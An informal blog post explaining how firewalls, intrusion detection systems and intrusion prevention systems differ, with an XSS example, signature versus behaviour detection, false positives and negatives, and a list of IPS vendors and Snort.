What's the difference between a Firewall and an IDS?
Let's say that Application A is Vulnerable to XSS (Cross Site Scripting), i.e. it has a bug, and Attackers can send Malicious Traffic to this Application that can harm that Server or those people who deal with it taking advantage of this bug. A Firewall can only block people from accessing this Application or permit them, but it can never know if this traffic is Malicious or not. A Firewall is only capable of inspection up to layer 4 (The Transport Layer), hence another solution is needed in order to inspect traffic up to layer 7 (The Application Layer). This solution is called an IDS or Intrusion Detection System.
How does an IDS work?
But what kind of magic does IDS's do in order to detect those attacks. We are now in the application layer and there is no 5-tuple to inspect anymore, so IDS's use various techniques to detect attacks. Let's go back to our XSS example.
Gr33n Data: Cross Site Scripting - XSS
By they way, the Antiviruses you use on your PC use similar techniques to detect malwares. And you know what, the Antivirus updates you download every now and then are files containing those signatures used by it in the Signature Based Detection. And yes, an IDS needs tp get periodic updates too, just like Antiviruses.
The Signature Based Detection is more accurate than Behavior Analysis in detecting Attacks, but Signature Based Detection can detect Known Attacks only while Behavior Analysis can detect both Known and Unknown Attacks, which are sometimes called Zero-Day Attacks. That's why Intrusion Detection Systems depend on both techniques together and sometimes they implement more proprietary techniques.
Accuracy, what do I mean by accuracy?
When there is an Attack and the IDS doesn't detect it, they call this False Negative, and on the other hand when there is no Attack and the IDS thinks that there is one, they call it False Positive. A good IDS is the one that tries to minimize both False Negatives and False Positives.
IDS is dead, long live the IPS
IDS is more complicated than a Firewall, it needs more processing and analysis that may impose some delays. It's also not accurate. That's why people preferred not to deploy them inline. The traffic doesn't pass by them, they just see a copy of it, and they do not take actions to block or permit traffic, they are just passive devices that fire an alarm whenever they detect an attack.
And that's why a few years ago a new technology was born, an IPS is just an IDS but it is deployed inline and capable of tacking the decision to block or permit traffic. By doing so IPS vendors were forced to increase their products accuracy as well as processing power.
Now a days that top players in the IPS field are Tipping Point (3Com), IntruShield (McAfee), NetScreen IDP (Juniper), and ISS Proventia (IBM). Cisco also have their own *quote* IPS *quote*. And if you are an Open Source fan, you can try Snort, these guys have good documentations and papers here.
Tags: IPS, Attacks, Gr33n Data